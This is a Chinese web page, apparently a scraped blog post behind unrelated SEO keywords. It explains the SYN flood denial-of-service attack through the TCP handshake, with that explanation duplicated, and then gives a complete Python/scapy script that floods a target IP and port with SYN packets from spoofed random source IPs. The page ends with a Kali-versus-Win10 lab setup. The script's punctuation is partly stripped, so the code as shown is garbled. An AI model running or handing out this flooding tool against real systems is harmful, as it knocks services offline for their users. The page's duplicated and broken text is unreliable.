优秀网站的要素有企业网络营销策划案

优秀网站的要素有,企业网络营销策划案,thinkphp5 做网站,ajax数据库网页网站设计SYN Flood攻击原理syn-flood(syn洪水)是种典型的DoS (Denial of Service#xff0c;拒绝服务) 攻击。效果就是服务器TCP连接资源耗尽#xff0c;停止响应正常的TCP连接请求。假设连接发起方是A#xff0c;连接接受方是B#xff0c;即B在某个端口#xff08;Port#xff0…SYN Flood攻击原理syn-flood(syn洪水)是种典型的DoS (Denial of Service拒绝服务) 攻击。效果就是服务器TCP连接资源耗尽停止响应正常的TCP连接请求。假设连接发起方是A连接接受方是B即B在某个端口Port上监听A发出的连接请求。如下图所示左边是A右边是B。SYN Flood攻击原理syn-flood(syn洪水)是种典型的DoS (Denial of Service拒绝服务) 攻击。效果就是服务器TCP连接资源耗尽停止响应正常的TCP连接请求。假设连接发起方是A连接接受方是B即B在某个端口Port上监听A发出的连接请求。如下图所示左边是A右边是B。A首先发送SYNSynchronization消息给B要求B做好接收数据的准备B收到后反馈SYN-ACKSynchronization-Acknowledgement 消息给A。这个消息的目的有两个向A确认已做好接收数据的准备同时要求A也做好接收数据的准备此时B已向A确认好接收状态并等待A的确认连接处于半开状态Half-Open顾名思义只开了一半A收到后再次发送ACK(Acknowledgement)消息给B向B确认也做好了接收数据的准备至此三次握手完成“连接”就建立了实际上只是双方都按对方的要求进入了可以接收消息的状态。以上彼此要求对方确认的“状态”主要是双方将要使用的消息序号(SequenceNum)TCP为保证消息按发送顺序抵达接收方的上层应用需要用消息序号来标记消息的发送先后顺序的。TCP是“双工”(Duplex)连接同时支持双向通信也就是双方同时可向对方发送消息其中SYN和SYN-ACK消息开启了A→B的单向通信通道B获知了A的消息序号SYN-ACK和ACK消息开启了B→A单向通信通道A获知了B的消息序号。以上讨论的是在双方诚实可信网络正常的理想状况下建立连接。但实际情况是网络可能不稳定会丢包使握手消息不能抵达对方也可能是对方故意不按规矩来故意延迟或不发送握手确认消息。假设B通过某TCP端口提供服务B在收到A的SYN消息时积极的反馈了SYN-ACK消息使连接进入半开状态因为B不确定自己发给A的SYN-ACK消息或A反馈的ACK消息是否会丢在半路所以会给每个待完成的半开连接都设一个Timer如果超过时间还没有收到A的ACK消息则重新发送一次SYN-ACK消息给A直到重试超过一定次数时才会放弃。A首先发送SYNSynchronization消息给B要求B做好接收数据的准备B收到后反馈SYN-ACKSynchronization-Acknowledgement 消息给A。这个消息的目的有两个向A确认已做好接收数据的准备同时要求A也做好接收数据的准备此时B已向A确认好接收状态并等待A的确认连接处于半开状态Half-Open顾名思义只开了一半A收到后再次发送ACK(Acknowledgement)消息给B向B确认也做好了接收数据的准备至此三次握手完成“连接”就建立了实际上只是双方都按对方的要求进入了可以接收消息的状态。以上彼此要求对方确认的“状态”主要是双方将要使用的消息序号(SequenceNum)TCP为保证消息按发送顺序抵达接收方的上层应用需要用消息序号来标记消息的发送先后顺序的。TCP是“双工”(Duplex)连接同时支持双向通信也就是双方同时可向对方发送消息其中SYN和SYN-ACK消息开启了A→B的单向通信通道B获知了A的消息序号SYN-ACK和ACK消息开启了B→A单向通信通道A获知了B的消息序号。以上讨论的是在双方诚实可信网络正常的理想状况下建立连接。但实际情况是网络可能不稳定会丢包使握手消息不能抵达对方也可能是对方故意不按规矩来故意延迟或不发送握手确认消息。假设B通过某TCP端口提供服务B在收到A的SYN消息时积极的反馈了SYN-ACK消息使连接进入半开状态因为B不确定自己发给A的SYN-ACK消息或A反馈的ACK消息是否会丢在半路所以会给每个待完成的半开连接都设一个Timer如果超过时间还没有收到A的ACK消息则重新发送一次SYN-ACK消息给A直到重试超过一定次数时才会放弃。使用python编写代码攻击syn.py#!/usr/bin/env python3 绕过连接拒绝 import socket import random import struct import time import sys from scapy.all import IP, TCP, send def send_syn_flood(target_ip, target_port, duration60): 发送SYN洪水攻击 print(f[*] 对 {target_ip}:{target_port} 发动SYN洪水攻击) print([*] 按 CtrlC 停止) count 0 start_time time.time() try: while time.time() - start_time duration: # 随机源IP和端口 src_ip f{random.randint(1,254)}.{random.randint(1,254)}. \ f{random.randint(1,254)}.{random.randint(1,254)} src_port random.randint(1024, 65535) # 创建SYN包 ip_layer IP(srcsrc_ip, dsttarget_ip) tcp_layer TCP(sportsrc_port, dporttarget_port, flagsS, seqrandom.randint(0, 4294967295)) # 发送无连接建立 send(ip_layer/tcp_layer, verbose0) count 1 # 显示进度 if count % 100 0: elapsed time.time() - start_time print(f[*] 已发送 {count} 个SYN包速率: {count/elapsed:.1f} 包/秒) # 避免太快导致本地网络问题 time.sleep(0.001) except KeyboardInterrupt: print(f\n[!] 用户停止攻击) elapsed time.time() - start_time print(f\n[] 攻击统计:) print(f 总数据包: {count}) print(f 持续时间: {elapsed:.1f}秒) print(f 平均速率: {count/elapsed:.1f}包/秒) return count 0 if __name__ __main__: if len(sys.argv) 3: print(用法: python syn_only.py 目标IP 目标端口 [持续时间秒数]) sys.exit(1) target_ip sys.argv[1] target_port int(sys.argv[2]) duration int(sys.argv[3]) if len(sys.argv) 3 else 60 # 验证IP try: socket.inet_aton(target_ip) except: print(f错误: 无效的IP地址: {target_ip}) sys.exit(1) # 检查scapy是否可用 try: from scapy.all import IP, TCP, send except ImportError: print(错误: 需要安装scapy库 (pip install scapy)) sys.exit(1) print([*] 警告: 仅用于授权的安全测试) result send_syn_flood(target_ip, target_port, duration) if result: print([] 攻击可能已生效 - 目标可能已崩溃或防火墙已介入) else: print([!] 攻击失败)环境准备kali和win10攻击对象win10ip192.168.136.136